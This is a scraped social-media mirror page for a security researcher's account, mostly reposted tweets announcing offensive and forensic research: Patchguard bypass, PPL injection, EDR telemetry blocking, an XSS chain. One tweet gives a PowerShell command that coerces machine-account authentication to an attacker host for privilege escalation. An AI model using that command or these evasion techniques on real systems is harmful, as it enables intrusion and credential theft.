Olivia
Online
Naacbin
@naacbin
Maldev, forensic and reverse makes me happy.
Joined October 2018
159 Following
165 Followers
158 Posts
I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code.
The client is now fully extendable and scriptable via the Python API
Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles.
It has worked against every version of Patchguard for the last 7 years, without needing any updates!
https://t.co/H5dDddpuMP
Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now:
https://t.co/xxxKppn0n6
That's huge news from my perspective🔥
I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver.
https://t.co/X0qHJPUlYb
Who to follow
rayanlecat
@rayanlecat
Adversary Simulation @Quarkslab
Kévin GERVOT (Mizu)
@kevin_mizu
Vulnerabilty researcher at @assetnote 🐛 | DOMLogger++ developer 👨🏻💻 | CTF with @FlatNetworkOrg, @rhackgondins 🦦 | @ECSC_TeamFrance 2023 🇫🇷
voydstack
@voydstack
VR @Synacktiv | CTF with @RMUBYGG, @Hexagonctf, @ECSC_TeamFrance 20/21/22/23/24
I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!"
This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy!
https://t.co/wAD7HYG6IW
Here is my #Friday #giveaways!
Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware
https://t.co/iUg1QScZqX
Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of @volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! https://t.co/CC54A8d1gm.
1/8
New lab 🏰 for the GOAD project 🥳: SCCM
You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware.
More information here:
https://t.co/BvAZgLSHQr
Repository here : https://t.co/mi3rP9hC1H
Thx again @KenjiEndo15 for your help to building this !
I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published!
https://t.co/iQtWoJbwep
Over the past few months, I've contributed on the https://t.co/7cw0Dyv8Cm repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes.
👇
https://t.co/2rU9EyZIDH
I documented https://t.co/tjZc5A8NgE and made 'low alignment PEs' (PoCs @ https://t.co/9nSpKDlFis) around 2009 but I'm pretty sure this was known before.
Any early case of ITW low-align PE ? cc @Hexacorn @a2_qkumba @hasherezade @rwfpl
Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
https://t.co/xcRXx4jiZz
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. Considered it so evil that we didn't publish it that time. It was pointless, now here it is by @netero_1010: https://t.co/TxxJrefTcW
Exegol holiday release is live 🎄🎁🎅
New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things!
https://t.co/R6K6iOqgUf
https://t.co/TwVCkgRQ2a
gg to the team @Dramelac_ @QU35T_TV 👏 and all contributors.
Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect!
https://t.co/zpgZ8UMFkc
Time to make @volatility 3 compatible with modern Windows hibernation file analysis.
Blog post : https://t.co/csNyxyZqO5
Feature : https://t.co/9UjMtS4TVp
Special thanks to @chadtilbury who gave me the motivation and @jtsylve, @vicomarziale, @nolaforensix for the incredible work
Last Seen Users on Sotwe
AZGİN1BEYY ANKARA TEK ERKEK (BULL)
Seen from Turkey
Tamil Kamakathaikal
Seen from Pakistan
الملكه
Seen from Algeria
Bursa Teşhir Seven çiftiz
Seen from Turkey
Qwen 
Seen from Singapore
şahin kalender
Seen from Turkey
Sen ben
Seen from Turkey
🏳️⚧️ BlackTgirlTube.com 🏳️⚧️ 152K Pics/Vidz 🔞
Seen from Argentina
ډيِـ‘ـٱثـ‘ـٱت حـ‘ـصـ‘ـريـ‘ـةّ 🥵
Md Biplob
Seen from Australia
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.2M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers